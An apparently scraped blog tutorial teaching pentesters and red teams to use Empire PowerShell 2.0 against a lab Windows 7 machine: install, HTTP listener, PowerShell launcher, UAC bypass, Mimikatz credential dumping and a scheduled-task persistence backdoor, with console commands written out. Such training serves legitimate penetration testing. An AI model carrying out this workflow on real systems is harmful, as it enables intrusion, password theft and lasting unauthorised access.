Empire PowerShell  - 07 home screen - Empire PowerShell Tutorial For PenTesters & Redteams

Hi, this is Gus and welcome to this exciting about the new version 2.0.

I’m pretty sure you’re curious and want to learn how to use it. In this lesson, I will walk you through and show you all the tricks so you can achieve your goals as a member of the red-team or as a penetration tester.

Let’s see together the workflow that I’ll be using for this demo.

- 01 Workflow - Empire PowerShell Tutorial For PenTesters & Redteams

First, I will show you how to install Empire

Second, you will learn how to create a listener. If you don’t know what a listener means. In fact, its name explains what it does, the listener listens for incoming connections from infected victims.

Next, I will show you how to create a script to send it to your victim using the launcher in Empire.

Now when the victim executes the script he will be connected back to the listener and this will create an agent representing the victim machine.

All we need at this stage is to interact with the agent to escalate our privileges so we can become some sort of an admin, why? I will show you how to run Mimikatz, for example, using your admin privilege to extract the victim’s passwords.

Finally, I will make sure that you learn how to create a persistent so you can go back anytime you want.

Before I start this Demo, I want to let you know that this blog has a video demo on youtube:

Let’s start the action!

First, open your browser and go to the Empire GitHub website and click on the “Clone or download” button to copy the URL to your clipboard.

Now go and open your terminal window and execute git clone and paste the URL.

$git clone https://github.com/EmpireProject/Empire.git

 

- 02 git - Empire PowerShell Tutorial For PenTesters & Redteams

 

This will download the to my home root directory in Kali .

 

Let’s explore this new folder.

 

If I check the contents of the empire directory I can see the setup folder.

 

Now I’m pretty sure that our installer is somewhere here

 

Here you go it’s the install.sh file.

Let’s give it the right permission and execute it to install Empire.

$chmod +x install.sh

$./install.sh

 

- 03 install - Empire PowerShell Tutorial For PenTesters & Redteams

The installation is going to take some time so be patient. After a while, the installer will ask you to enter a password or press enter to generate a random password, I’m going to press enter, and we’re done!

- 04 password - Empire PowerShell Tutorial For PenTesters & Redteams

I will go up one directory to execute the empire application, but before doing this I will give it the right permission as well.

$cd ..

$ls

$chmod +x empire

 

- 05 pre execute - Empire PowerShell Tutorial For PenTesters & Redteams

Perfect, it’s the time to execute this monster.

- 06 execute - Empire PowerShell Tutorial For PenTesters & Redteams

Voila! this is the Empire home screen. As you can see we have 267 modules ready to be used and No listeners or agents and that’s normal because it’s a fresh copy of Empire.

- 07 home screen - Empire PowerShell Tutorial For PenTesters & Redteams

Let’s start by creating a listener. Type listeners

 

And you will get this message

[!] No listeners currently active

 - 08 listeners - Empire PowerShell Tutorial For PenTesters & Redteams

wait this is not an error message check the prompt, it changed to the listeners mode.

Next, I will choose the http based listener, so type:

 

And the prompt changed to the http listener, alright it’s time to execute it:

 

Amazing! we should have a listener active at this moment.

 

Here in the details it shows that the Name of this listener is http and it’s listening on port 80 on my Kali Linux machine.

- 09 listeners info - Empire PowerShell Tutorial For PenTesters & Redteams

At this stage we need to create a launcher just type it in the terminal window and you get this message:

- 010 launcher help - Empire PowerShell Tutorial For PenTesters & Redteams

By analyzing this message let’s generate a PowerShell script and the listener name is http.

$> launcher powerhsell http

- 011 launcher powershell - Empire PowerShell Tutorial For PenTesters & Redteams

Perfect, let’s copy this PowerShell script to be ready for our windows7 machine.

I will open a new terminal window and use the remote desktop to connect remotely to the victim machine -u is for the user name -p is for the password and the IP address of the windows 7 host.

- 012 rdesktop - Empire PowerShell Tutorial For PenTesters & Redteams

Let’s open a command prompt in windows and paste the powershell script.

- 013 paste cmd - Empire PowerShell Tutorial For PenTesters & Redteams

 

Beautiful, let’s go back to the Empire terminal window, and we have an agent active.

- 014 InitAgent - Empire PowerShell Tutorial For PenTesters & Redteams

Type back to go to the main window.

And here type agents to list the available agents.

- 015 agents list - Empire PowerShell Tutorial For PenTesters & Redteams

We can see all the information needed that represents our Win7 machine, but the name is very random so I will rename it to something more meaningful.

Type rename followed by the first two letters then press tab and it will recognize it. Then type the desired new name.

$> rename [old name] [new name]

- 016 rename agent1 - Empire PowerShell Tutorial For PenTesters & Redteams

 

To list the agents at this stage you type list

- 017 list agent1 - Empire PowerShell Tutorial For PenTesters & Redteams

And here you go our new name for the windows 7 agent.

Let’s try to interact with this agent:

And type info to see the necessary information about it.

- 018 interact agent1 - Empire PowerShell Tutorial For PenTesters & Redteams

- 019 info agent1 - Empire PowerShell Tutorial For PenTesters & Redteams

 

Pay attention here, the High priority is set to 0, that’s because we are not admin. The next step is to elevate our privileges. We can become an admin in a single command and it’s called bypassuac followed by the name of the listener.

- 020 bypassuac - Empire PowerShell Tutorial For PenTesters & Redteams

Wait for a couple of seconds and you should see some coming your way, and we have a new agent.

Press enter, go back and execute the list command to see the new agent.

$> [enter]

$> back

$> list

- 021 list agent2 - Empire PowerShell Tutorial For PenTesters & Redteams

 

Check the difference here we have an asterisk before the username that means this a power user let’s rename this new agent:

$> rename [old name] [new name]

 

Let’s start interacting with this new agent.

$> interact [agent name]

$> info

- 022 interactagent2 - Empire PowerShell Tutorial For PenTesters & Redteams

Pay attention to the high integrity it’s 1 instead of zero.

- 023 highintegrity - Empire PowerShell Tutorial For PenTesters & Redteams

Perfect, let’s run Mimikatz to extract the clear text passwords but first type creds to list all the cleartext passwords, and it’s empty.

- 024 creds1 - Empire PowerShell Tutorial For PenTesters & Redteams

Next, run mimikatz and wait for a few seconds to finish its execution.

- 025 mimikatz - Empire PowerShell Tutorial For PenTesters & Redteams

Awesome! let’s see the credential list and here you go all the passwords are extracted for us.

- 026 creds2 - Empire PowerShell Tutorial For PenTesters & Redteams

It’s time for our final stage and it’s the backdoor persistence, if you’re ever lost in this application you have always the chance to type the help command to see the available choices:

- 027 help - Empire PowerShell Tutorial For PenTesters & Redteams

To create a persistent backdoor I will use the module schtasks in Empire.

$>  usemodule persistence/elevated/schtasks

- 028 schtasks - Empire PowerShell Tutorial For PenTesters & Redteams

Let’s check its options, I will set the onLogon to True because I want it to execute every time the victim user login to this machine. And set the listener name to http

And finally execute it:

$> info

$> set onLogon True

$> set Listener http

$> execute

- 029 persistence options - Empire PowerShell Tutorial For PenTesters & Redteams

- 030 execute persistence - Empire PowerShell Tutorial For PenTesters & Redteams

And we now have a persistent backdoor with a big success.

Thank you for reading this tutorial. I hope that you liked it, until the next time!In this lesson, I will walk you through and show you all the tricks so you can achieve your goals as a member of the red-team or as a penetration tester.

It’s only fair to share…Share on Facebook  - facebook - Empire PowerShell Tutorial For PenTesters & RedteamsShare on Google+  - google - Empire PowerShell Tutorial For PenTesters & RedteamsTweet about this on Twitter  - twitter - Empire PowerShell Tutorial For PenTesters & RedteamsShare on LinkedIn  - linkedin - Empire PowerShell Tutorial For PenTesters & Redteams





Source link
Based Blockchain Network

LEAVE A REPLY

Please enter your comment!
Please enter your name here